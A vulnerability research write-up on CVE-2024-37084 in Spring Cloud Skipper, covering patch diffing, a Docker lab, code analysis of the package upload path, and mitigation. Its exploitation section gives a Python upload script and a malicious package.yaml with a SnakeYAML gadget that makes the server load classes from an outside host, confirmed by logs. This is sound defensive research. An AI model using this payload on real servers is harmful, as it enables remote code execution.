CVE-2024-37084 is a critical security vulnerability in Spring Cloud Skipper, specifically related to how the application processes YAML input. The vulnerability arises from the use of the standard Yaml constructor, which allows for the deserialization of arbitrary objects. This flaw could be exploited by an attacker providing malicious YAML data, potentially leading to remote code execution. The vulnerability affects versions 2.11.0 through 2.11.3 of Spring Cloud Skipper. A patch was introduced that replaces the standard constructor with SafeConstructor, which restricts deserialization to safe object types, preventing the execution of harmful code. Additionally, custom constructors and enhanced test coverage were implemented to ensure the security and integrity of YAML processing within the application.
What is Spring Cloud Dataflow?
Spring Cloud Dataflow is a comprehensive toolkit designed for building and orchestrating data pipelines in a microservices architecture. It is part of the Spring ecosystem and focuses on enabling real-time and batch data processing. The platform allows developers to create, deploy, and manage data processing workflows that can handle various data integration and processing tasks, such as ETL (Extract, Transform, Load) operations, stream processing, and event-driven data handling.
Patch Diffing
The patch for CVE-2024-37084, detailed on GitHub, addresses security vulnerabilities in YAML processing within Spring Cloud Skipper. The changes impact several files, introducing SafeConstructor to ensure secure YAML deserialization and creating custom constructors for specific data types.
Usage of SafeConstructor
List of updated files:
- ReleaseReportService.java
- ArgumentSanitizer.java
- ManifestUtils.java
- BaseDocumentation.java
- ConfigValueUtilsTests.java
- ManifestCommands.java
- DefaultPackageReader.java
- DefaultPackageWriter.java
- DefaultYamlConverter.java
- PackageWriterTests.java
Before the patch, these files utilized standard constructors for YAML processing. These constructors were insufficiently secure, leaving the system vulnerable to exploits such as arbitrary code execution. The patch replaces them with SafeConstructor, a secure alternative that ensures only safe objects are instantiated during YAML deserialization. This change is crucial in preventing malicious code from being executed, particularly when processing untrusted YAML inputs.
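To illustrate the kind of change involved, here is a minimal sketch of the before/after constructor swap. This is not the exact patch diff: the class and method names below are just for illustration, and constructor signatures differ slightly between SnakeYAML versions.

import org.springframework.cloud.skipper.domain.PackageMetadata;
import org.yaml.snakeyaml.LoaderOptions;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.Constructor;
import org.yaml.snakeyaml.constructor.SafeConstructor;

class YamlConstructorComparison {

    // Before: a type-binding Constructor allows global YAML tags to instantiate arbitrary classes.
    static Yaml unsafeYaml() {
        LoaderOptions loaderOptions = new LoaderOptions();
        return new Yaml(new Constructor(PackageMetadata.class, loaderOptions));
    }

    // After: SafeConstructor only builds standard types (maps, lists, scalars),
    // so a tag such as !!javax.script.ScriptEngineManager makes the load fail.
    static Yaml safeYaml() {
        return new Yaml(new SafeConstructor(new LoaderOptions()));
    }
}

Note that with a plain SafeConstructor the loaded result is a generic map rather than a PackageMetadata bean, which is why the patch also introduces a custom constructor for that type, covered in the next section.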
Custom Constructor for PackageMetadata
List of updated files:
- PackageMetadataSafeConstructor.java
A new custom constructor, PackageMetadataSafeConstructor, is introduced for safely deserializing PackageMetadata objects. This constructor ensures that the deserialization process adheres strictly to expected data structures and types, reducing the risk of security vulnerabilities related to deserialization. This tailored approach is particularly important for processing sensitive data like package metadata, where the integrity and security of the data must be maintained.
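To give a feel for this pattern, here is a minimal illustrative sketch of such a constructor. It is not the patched source: the class name and the handled properties are abbreviated and invented for illustration, and SnakeYAML constructor signatures differ slightly between 1.x and 2.x.

import org.springframework.cloud.skipper.domain.PackageMetadata;
import org.yaml.snakeyaml.LoaderOptions;
import org.yaml.snakeyaml.constructor.AbstractConstruct;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import org.yaml.snakeyaml.nodes.MappingNode;
import org.yaml.snakeyaml.nodes.Node;
import org.yaml.snakeyaml.nodes.NodeTuple;
import org.yaml.snakeyaml.nodes.ScalarNode;
import org.yaml.snakeyaml.nodes.Tag;

// Illustrative sketch only: extend SafeConstructor and route the document root to a
// hand-written construct, so fields are copied one by one and no YAML tag can ever
// choose which class gets instantiated.
public class IllustrativePackageMetadataConstructor extends SafeConstructor {

    public IllustrativePackageMetadataConstructor(LoaderOptions options) {
        super(options);
        this.rootTag = new Tag(PackageMetadata.class);
        this.yamlConstructors.put(this.rootTag, new ConstructPackageMetadata());
    }

    private static class ConstructPackageMetadata extends AbstractConstruct {
        @Override
        public Object construct(Node node) {
            PackageMetadata metadata = new PackageMetadata();
            for (NodeTuple tuple : ((MappingNode) node).getValue()) {
                String key = ((ScalarNode) tuple.getKeyNode()).getValue();
                String value = ((ScalarNode) tuple.getValueNode()).getValue();
                switch (key) {
                    case "name": metadata.setName(value); break;
                    case "version": metadata.setVersion(value); break;
                    case "displayName": metadata.setDisplayName(value); break;
                    // ...remaining String properties would be handled the same way.
                    default: break; // unknown keys are ignored rather than deserialized
                }
            }
            return metadata;
        }
    }
}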
Enhanced Test Coverage
List of updated files:
- PackageMetadataSafeConstructorTests.java
- PackageWriterTests.java
The patch enhances test coverage by introducing new tests in PackageMetadataSafeConstructorTests.java and updating existing ones in PackageWriterTests.java. These tests verify the correct and secure handling of YAML input using the newly introduced SafeConstructor and custom constructors. The tests ensure that the system behaves correctly under both normal and malicious input scenarios, providing additional assurance that the patch effectively mitigates the identified vulnerabilities.
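As a rough idea of what such a test can assert, here is a hypothetical sketch (class and method names are invented for illustration, and it assumes JUnit 5 plus SnakeYAML 2.x-style constructors), not the project's actual test code:

import static org.junit.jupiter.api.Assertions.assertThrows;

import org.junit.jupiter.api.Test;
import org.yaml.snakeyaml.LoaderOptions;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import org.yaml.snakeyaml.error.YAMLException;

class SafeYamlLoadingSketchTests {

    // A document carrying a global tag must be rejected instead of instantiating the class.
    @Test
    void rejectsGlobalTags() {
        Yaml yaml = new Yaml(new SafeConstructor(new LoaderOptions()));
        String malicious = "displayName: !!javax.script.ScriptEngineManager []";
        assertThrows(YAMLException.class, () -> yaml.load(malicious));
    }
}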
Before vs After Patch
Before Patch:
- YAML processing across multiple files was handled using basic constructors. These constructors were not secure, exposing the system to risks such as arbitrary code execution or data manipulation if the YAML input was crafted maliciously.
After Patch:
- The introduction of SafeConstructor across all relevant files ensures that YAML deserialization is secure, significantly reducing the potential for security vulnerabilities. Additionally, custom constructors like PackageMetadataSafeConstructor provide specialized security measures for specific data types. The patch also includes enhanced testing to validate the effectiveness of these changes.
Lab Setup
The affected versions are in the 2.11.x and 2.10.x lines (prior to the 2.11.4 fix), so any affected version works for the analysis; I am using 2.11.0. Under spring-cloud-dataflow-2.11.0/src/docker-compose, we can find the docker-compose.yml file. We will add JAVA_TOOL_OPTIONS=-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005 to the environment section under skipper-server, so we can debug it during the dynamic analysis:
Now, let's deploy our lab:
sudo docker-compose up -d
Here, we can see the dashboard:
And the Skipper Server API:
The Analysis
When we first view the upload method from /Users/labatrixmacenv/Desktop/spring-cloud-dataflow-2.11.0/spring-cloud-skipper/spring-cloud-skipper-server-core/src/main/java/org/springframework/cloud/skipper/server/service/PackageService.java:
@Transactional
public PackageMetadata upload(UploadRequest uploadRequest) {
    validateUploadRequest(uploadRequest);
    Repository localRepositoryToUpload = getRepositoryToUpload(uploadRequest.getRepoName());
    Path packageDirPath = null;
    try {
        packageDirPath = TempFileUtils.createTempDirectory("skipperUpload");
        File packageDir = new File(packageDirPath + File.separator + uploadRequest.getName());
        packageDir.mkdir();
        Path packageFile = Paths
                .get(packageDir.getPath() + File.separator + uploadRequest.getName() + "-"
                        + uploadRequest.getVersion() + "." + uploadRequest.getExtension());
        Assert.isTrue(packageDir.exists(), "Package directory doesn't exist.");
        Files.write(packageFile, uploadRequest.getPackageFileAsBytes());
        ZipUtil.unpack(packageFile.toFile(), packageDir);
        String unzippedPath = packageDir.getAbsolutePath() + File.separator + uploadRequest.getName()
                + "-" + uploadRequest.getVersion();
        File unpackagedFile = new File(unzippedPath);
        Assert.isTrue(unpackagedFile.exists(), "Package is expected to be unpacked, but it doesn't exist");
        Package packageToUpload = this.packageReader.read(unpackagedFile);
        PackageMetadata packageMetadata = packageToUpload.getMetadata();
        if (!packageMetadata.getName().equals(uploadRequest.getName())
                || !packageMetadata.getVersion().equals(uploadRequest.getVersion())) {
            throw new SkipperException(String.format("Package definition in the request [%s:%s] " +
                    "differs from one inside the package.yml [%s:%s]",
                    uploadRequest.getName(), uploadRequest.getVersion(),
                    packageMetadata.getName(), packageMetadata.getVersion()));
        }
        if (localRepositoryToUpload != null) {
            packageMetadata.setRepositoryId(localRepositoryToUpload.getId());
            packageMetadata.setRepositoryName(localRepositoryToUpload.getName());
        }
        packageMetadata.setPackageFile(new PackageFile((uploadRequest.getPackageFileAsBytes())));
        return this.packageMetadataRepository.save(packageMetadata);
    }
    catch (IOException e) {
        throw new SkipperException("Failed to upload the package.", e);
    }
    finally {
        if (packageDirPath != null && !FileSystemUtils.deleteRecursively(packageDirPath.toFile())) {
            logger.warn("Temporary directory can not be deleted: " + packageDirPath);
        }
    }
}
Static Analysis
Let’s analyze the upload() method:
Validation and Repository Retrieval
validateUploadRequest(uploadRequest);
Repository localRepositoryToUpload = getRepositoryToUpload(uploadRequest.getRepoName());
The method begins by validating the UploadRequest object through a call to validateUploadRequest(uploadRequest). It then calls getRepositoryToUpload(uploadRequest.getRepoName()) to retrieve the repository where the package will be uploaded. We can discover the existing repositories through /api/repositories.
Temporary Directory Creation
Path packageDirPath = TempFileUtils.createTempDirectory("skipperUpload");
File packageDir = new File(packageDirPath + File.separator + uploadRequest.getName());
packageDir.mkdir();
A temporary directory is created using TempFileUtils.createTempDirectory("skipperUpload"). This directory serves as a workspace where the package file will be processed. The directory is created with a unique name to avoid conflicts. A subdirectory named after the package is then created within this temporary directory using File packageDir = new File(packageDirPath + File.separator + uploadRequest.getName());. The mkdir() call physically creates this subdirectory on the file system.
Package File Creation and Writing
Path packageFile = Paths.get(packageDir.getPath() + File.separator + uploadRequest.getName() + "-" + uploadRequest.getVersion() + "." + uploadRequest.getExtension());
Assert.isTrue(packageDir.exists(), "Package directory doesn't exist.");
Files.write(packageFile, uploadRequest.getPackageFileAsBytes());
The full path for the package file is constructed using Paths.get(), which combines the directory path, package name, version, and file extension. This path points to where the uploaded package will be stored. The method then verifies that the package directory exists using Assert.isTrue(packageDir.exists(), "Package directory doesn't exist.");. This is a safety check to ensure that the package can be written to the correct location. Finally, the package file is written to disk using Files.write(packageFile, uploadRequest.getPackageFileAsBytes());, where the byte content of the file is obtained from the uploadRequest.
Unpacking and Validating the Package
ZipUtil.unpack(packageFile.toFile(), packageDir);
String unzippedPath = packageDir.getAbsolutePath() + File.separator + uploadRequest.getName() + "-" + uploadRequest.getVersion();
File unpackagedFile = new File(unzippedPath);
Assert.isTrue(unpackagedFile.exists(), "Package is expected to be unpacked, but it doesn't exist");
The package file, assumed to be a ZIP file, is unpacked into the temporary directory using ZipUtil.unpack(). This step extracts the contents of the package so they can be further processed. The path to the unpacked content is constructed and stored in unzippedPath. The method then checks whether the unpacked content exists using Assert.isTrue(unpackagedFile.exists(), "Package is expected to be unpacked, but it doesn't exist");. This ensures that the unpacking process was successful and that the package contents are available for further processing.
Reading Package Metadata
Package packageToUpload = this.packageReader.read(unpackagedFile);
PackageMetadata packageMetadata = packageToUpload.getMetadata();
if (!packageMetadata.getName().equals(uploadRequest.getName()) || !packageMetadata.getVersion().equals(uploadRequest.getVersion())) {
    throw new SkipperException(String.format("Package definition in the request [%s:%s] differs from one inside the package.yml [%s:%s]",
            uploadRequest.getName(), uploadRequest.getVersion(), packageMetadata.getName(), packageMetadata.getVersion()));
}
The unpacked package is read by calling this.packageReader.read(unpackagedFile), which parses the package metadata file (package.yml or package.yaml) to extract metadata about the package. The extracted metadata is then compared with the information provided in the uploadRequest. If there is a discrepancy between the requested package name/version and what is found inside the package, an exception is thrown. This validation step ensures that the package content matches what the user intended to upload.
packageReader.read
When we go to the read() method of packageReader, we can see the following:
We can see that DefaultPackageReader.java implements PackageReader. Now, when we go to spring-cloud-dataflow-2.11.0/spring-cloud-skipper/spring-cloud-skipper/src/main/java/org/springframework/cloud/skipper/io/DefaultPackageReader.java, we can see the read() method:
Basically, the read() method is responsible for loading a package from a given directory, processing various types of files within that directory, and constructing a Package object. The method handles package metadata, configuration values, templates, and dependent packages, among other things. Let's analyze it:
Input Validation
Assert.notNull(packageDirectory, "File to load package from can not be null");
The method begins by ensuring that the packageDirectory is not null.
Walking the Directory
List<File> files;
try (Stream<Path> paths = Files.walk(Paths.get(packageDirectory.getPath()), 1)) {
    files = paths.map(i -> i.toAbsolutePath().toFile()).collect(Collectors.toList());
}
catch (IOException e) {
    throw new SkipperException("Could not process files in path " + packageDirectory.getPath() + ". " + e.getMessage(), e);
}
Here the method walks through the directory using Files.walk(), which generates a stream of file paths within the directory, limited to a depth of 1. This ensures that only the immediate contents of the directory, and not any subdirectories, are explored. The paths are then converted to absolute File objects and collected into a list, which will later be iterated over to process each file. If an IOException occurs during this process, it is caught, and a custom SkipperException is thrown, providing a detailed error message that includes the directory path.
Package Initialization
Package pkg = new Package();
List<FileHolder> fileHolders = new ArrayList<>();
After that, it initializes a new Package object, pkg, which will eventually hold the metadata, configuration, templates, and other relevant package information. Additionally, a list of FileHolder objects is initialized to store references to specific files, particularly manifest files, within the package.
Files Processing
if (file.getName().equalsIgnoreCase("package.yaml") || file.getName().equalsIgnoreCase("package.yml")) {
pkg.setMetadata(loadPackageMetadata(file));
continue;
}
The method iterates over the list of files, handling each based on its type and purpose within the package. It first looks for a file named package.yaml or package.yml, which typically contains the package’s metadata. If such a file is found, it is loaded into the Package object using the loadPackageMetadata(file) method, and the loop continues to the next file.
if (file.getName().endsWith("manifest.yaml") || file.getName().endsWith("manifest.yml")) {
fileHolders.add(loadManifestFile(file));
continue;
}
Next, the method checks for files ending in manifest.yaml or manifest.yml, which are likely used to define the structure or content of the package. These files are processed and stored in fileHolders using the loadManifestFile(file) method.
if (file.getName().equalsIgnoreCase("values.yaml") || file.getName().equalsIgnoreCase("values.yml")) {
pkg.setConfigValues(loadConfigValues(file));
continue;
}
The method then looks for configuration files named values.yaml or values.yml, which contain configuration values. These values are loaded into the Package object using the loadConfigValues(file) method.
final File absoluteFile = file.getAbsoluteFile();
if (absoluteFile.isDirectory() && absoluteFile.getName().equals("templates")) {
    pkg.setTemplates(loadTemplates(file));
    continue;
}
Following this, the method checks if the file is a directory named templates, which likely contains template files. If found, the templates are loaded into the Package object using the loadTemplates(file) method.
if ((file.getName().equalsIgnoreCase("packages") && file.isDirectory())) {
File[] dependentPackageDirectories = file.listFiles();
List<Package> dependencies = new ArrayList<>();
for (File dependentPackageDirectory : dependentPackageDirectories) {
dependencies.add(read(dependentPackageDirectory));
}
pkg.setDependencies(dependencies);
}
Finally, the method checks if the file is a directory named packages, which likely contains dependent packages. The method recursively calls read(dependentPackageDirectory) for each directory within packages, building a list of dependent Package objects. These dependencies are then added to the Package object.
Finalizing the Package
if (!fileHolders.isEmpty()) {
    pkg.setFileHolders(fileHolders);
}
return pkg;
If any manifest files were found and processed, they are added to the Package object using pkg.setFileHolders(fileHolders);. Finally, the fully populated Package object, containing all relevant metadata, configuration values, templates, and dependencies, is returned.
loadPackageMetadata
Now let's look at loadPackageMetadata(), which is triggered when a package.yaml (or package.yml) file is matched. Basically, the loadPackageMetadata() method is designed to read a YAML file and convert its contents into a PackageMetadata object. It handles file reading, YAML parsing, and object mapping while ensuring that any missing properties in the YAML file do not cause errors during object creation.
DumperOptions options = new DumperOptions();
Representer representer = new Representer(options);
representer.getPropertyUtils().setSkipMissingProperties(true);
LoaderOptions loaderOptions = new LoaderOptions();
Yaml yaml = new Yaml(new Constructor(PackageMetadata.class, loaderOptions), representer);
The method begins by setting up YAML parser options by initializing a DumperOptions object and a Representer object, where the Representer is configured to skip any missing properties when mapping YAML data to the Java object. This setup ensures that if a property is missing from the YAML file, it won't cause an error, and the corresponding field in the PackageMetadata object will remain uninitialized. The LoaderOptions object is then configured, and a Yaml object is created with a custom constructor to map the YAML content directly into a PackageMetadata class.
String fileContents = null;
try {
    fileContents = FileUtils.readFileToString(file);
}
catch (IOException e) {
    throw new SkipperException("Error reading yaml file", e);
}
Following this setup, the method reads the YAML file contents into a string using FileUtils.readFileToString(file), simplifying the process of converting the entire file content into a string. If an IOException occurs during this process, the method catches the exception and throws a custom SkipperException with a relevant error message.
PackageMetadata pkgMetadata = (PackageMetadata) yaml.load(fileContents);
Finally, the string content of the YAML file is parsed using the yaml.load(fileContents) method, converting the YAML data into a PackageMetadata object, provided the class structure matches the YAML file’s structure.
In this method the issue arises during the parsing and deserialization of the YAML content into a PackageMetadata object. The parser is set up with a Constructor that maps YAML content directly to the PackageMetadata class, which is risky when dealing with untrusted input. The deserialization happens at yaml.load(fileContents), and if the YAML file contains special tags such as !!javax.script.ScriptEngineManager, the parser will attempt to create instances of those Java classes, potentially leading to the execution of arbitrary code, such as loading and running a remote Java class. This lack of restriction or filtering in the deserialization process makes the method vulnerable to Remote Code Execution (RCE), as it allows dangerous YAML tags to be processed without proper safeguards.
package.yaml content
Now, to understand what package.yaml can contain, recall that loadPackageMetadata returns a PackageMetadata. When we go to spring-cloud-dataflow-2.11.0/spring-cloud-skipper/spring-cloud-skipper/src/main/java/org/springframework/cloud/skipper/domain/PackageMetadata.java:
public class PackageMetadata extends AbstractEntity {

    /**
     * The Package Index spec version this file is based on.
     * we enforce apiVersion during package creation.
     */
    @NotNull
    private String apiVersion;

    /**
     * Indicates the origin of the repository (free form text).
     */
    private String origin;

    /**
     * The repository ID this Package belongs to.
     */
    @NotNull
    private Long repositoryId;

    /**
     * The repository name this Package belongs to.
     */
    @NotNull
    private String repositoryName;

    /**
     * What type of package system is being used.
     */
    @NotNull
    private String kind;

    /**
     * The name of the package
     */
    @NotNull
    private String name;

    /**
     * The display name of the package
     */
    private String displayName;

    /**
     * The version of the package
     */
    @NotNull
    private String version;

    /**
     * Location to source code for this package.
     */
    @Lob
    // @Column(columnDefinition = "text")
    private String packageSourceUrl;

    /**
     * The home page of the package
     */
    @Lob
    // @Column(columnDefinition = "text")
    private String packageHomeUrl;
Here we can see all the parameters and attributes that can be used in package.yaml:
We can confirm that displayName is one of these parameters; it is exposed from the class through the getDisplayName() method, and the same applies to the other parameters and attributes.
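For reference, each property follows the standard bean accessor pattern along these lines (a sketch showing only displayName; SnakeYAML's type-binding Constructor relies on setters like this to populate each key it finds in package.yaml):

// Sketch of the accessor pair for the displayName property of PackageMetadata.
public String getDisplayName() {
    return displayName;
}

public void setDisplayName(String displayName) {
    this.displayName = displayName;
}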
Static Analysis Summary
Dynamic Analysis
Now, let’s perform dynamic analysis to confirm our findings.
After adding Remote JVM Debug, we proceed with the configuration:
Next, we set a breakpoint on the upload method.
We will send a request using the following Python code:
import requests
import json


def zip_to_byte_array(zip_file_path):
    """
    Converts a ZIP file to a list of integers representing the byte array.

    :param zip_file_path: The path to the ZIP file.
    :return: List of integers representing the ZIP file as a byte array.
    """
    with open(zip_file_path, 'rb') as zip_file:
        return list(zip_file.read())


def upload_package(url, repo_name, package_name, version, extension, package_file_as_bytes):
    """
    Sends a POST request to the given URL with the upload package request body.

    :param url: The URL to send the request to.
    :param repo_name: The repository name where the package will be uploaded.
    :param package_name: The name of the package.
    :param version: The version of the package.
    :param extension: The file extension of the package (should be 'zip').
    :param package_file_as_bytes: The list of integers representing the byte array of the package file.
    :return: The response from the server.
    """
    upload_request = {
        "repoName": repo_name,
        "name": package_name,
        "version": version,
        "extension": extension,
        "packageFileAsBytes": package_file_as_bytes
    }
    headers = {
        'Content-Type': 'application/json'
    }
    response = requests.post(url, headers=headers, data=json.dumps(upload_request))
    return response


if __name__ == "__main__":
    # Define the parameters
    repo_name = "local"
    package_name = "thePoc"
    version = "1.0.0"
    extension = "zip"
    zip_file_path = "thePoc.zip"

    # Convert the ZIP file to a list of integers (byte array)
    package_file_as_bytes = zip_to_byte_array(zip_file_path)

    # URL to send the request to
    url = "http://127.0.0.1:7577/api/package/upload"

    # Upload the package
    response = upload_package(url, repo_name, package_name, version, extension, package_file_as_bytes)

    # Print the response from the server
    print(f"Status Code: {response.status_code}")
    print(f"Response Body: {response.text}")
The contents of the package.yaml file we are going to compress are as follows:
repositoryId: 1
kind: test
repositoryName: local
apiVersion: 1.0.0
version: 1.0.0
origin: thePoc
displayName: JustaPoC
name: thePoc
Let’s compress the file, send the request, and start debugging the flaw.
When we hit our breakpoint, we begin our debugging process.
After validating the request and checking if the repository exists, the method creates a temporary directory /tmp/skipperUpload5366669604351457826 for the upload.
Next, a path for our zip file is created, and it is written using Files.write. We can see that the file name includes the version and the name provided in the request.
Our zip file is then unzipped using ZipUtil.unpack, and a full path is generated: /tmp/skipperUpload5366669604351457826/thePoc/thePoc-1.0.0. The method checks whether this path exists using Assert.isTrue(unpackagedFile.exists(), "Package is expected to be unpacked, but it doesn't exist");.
In our case, the path /tmp/skipperUpload5366669604351457826/thePoc/thePoc-1.0.0 was not found. This makes sense since we did not include a folder named thePoc-1.0.0 in the package we uploaded, so the read() method was not triggered; the zip must contain a top-level directory named <name>-<version> (here thePoc-1.0.0) that holds package.yaml. Let's fix this and continue debugging.
Now, we see that no exception is thrown as the path is found, and the read() method is triggered.
We step into the read() method and continue our analysis.
Upon iterating over the files and reaching package.yaml, we observe that the loadPackageMetadata method is triggered.
We can see that it successfully loaded all of our parameters and attributes with the values we provided, and the loadPackageMetadata method completes its execution.
Dynamic Analysis Summary
Exploitation
For the exploitation part, after reading the Snyk blog post on the unsafe deserialization vulnerability in SnakeYAML (CVE-2022-1471), we can use the following payload:
!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://localhost:8080/"]]]]
It leverages the ability of the YAML parser to deserialize the YAML content directly into Java objects. When this YAML is parsed by a vulnerable YAML parser, it will attempt to instantiate a ScriptEngineManager, which then uses the URLClassLoader to load and execute classes from the specified URL (http://localhost:8080/). Let's test it against our target.
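For clarity, the object graph the parser is being tricked into building is roughly equivalent to the following plain Java (an illustrative sketch, not code from the project):

import java.net.URL;
import java.net.URLClassLoader;
import javax.script.ScriptEngineManager;

class GadgetSketch {

    // Roughly what the tagged YAML makes the vulnerable parser construct: a
    // ScriptEngineManager that scans a remote URLClassLoader for ScriptEngineFactory
    // service providers, causing attacker-hosted classes to be fetched and initialized.
    static void equivalentObjectGraph() throws Exception {
        URLClassLoader remoteLoader = new URLClassLoader(new URL[] { new URL("http://localhost:8080/") });
        new ScriptEngineManager(remoteLoader);
    }
}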
package.yaml:
repositoryId: 1
repositoryName: local
apiVersion: 1.0.0
version: 1.0.0
kind: test
origin: thePoc
displayName: !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://192.168.0.103:1339/poc"]]]]
name: thePoc
output:
CVE_2024_37084 % python3 -m http.server 1339
Serving HTTP on :: port 1339 (http://[::]:1339/) ...
::ffff:192.168.0.103 - - [30/Aug/2024 17:34:41] code 404, message File not found
::ffff:192.168.0.103 - - [30/Aug/2024 17:34:41] "GET /poc HTTP/1.1" 404 -
Here we can clearly see that it works: the Skipper server reached out to our HTTP listener and requested /poc.
Mitigation
| Product | Affected Version(s) | Fix Version | Mitigation |
| --- | --- | --- | --- |
| Spring Cloud Skipper | 2.11.0 – 2.11.3 | 2.11.4 | Users of affected versions should upgrade to the corresponding fixed version. |
This table provides a clear and concise summary of the mitigation steps for the vulnerability in Spring Cloud Skipper versions 2.11.0 to 2.11.3.
Conclusion
This vulnerability arises from the use of a standard Yaml constructor, which permits the deserialization of arbitrary objects. This flaw exposes systems to potential remote code execution (RCE) attacks if malicious YAML data is provided. Through both static and dynamic analysis, it was observed that the vulnerable method allows the processing of YAML input without sufficient safeguards, enabling attackers to inject and execute arbitrary code via carefully crafted payloads. For example, the use of the !!javax.script.ScriptEngineManager tag, combined with a URLClassLoader, allows malicious classes to be loaded and executed remotely, highlighting the severe impact of this vulnerability.
References
- https://dataflow.spring.io/docs/
- https://dataflow.spring.io/docs/installation/local/docker/
- https://docs.spring.io/spring-cloud-dataflow/docs/current/reference/htmlsingle/#api-guide
- https://spring.io/projects/spring-cloud-skipper#learn
- https://github.com/spring-cloud/spring-cloud-dataflow/commit/bcb060d8ba985a851a1efb15bcc85653293b7eef?diff=split&w=1
- https://snyk.io/blog/unsafe-deserialization-snakeyaml-java-cve-2022-1471/
- https://github.com/spring-cloud/spring-cloud-dataflow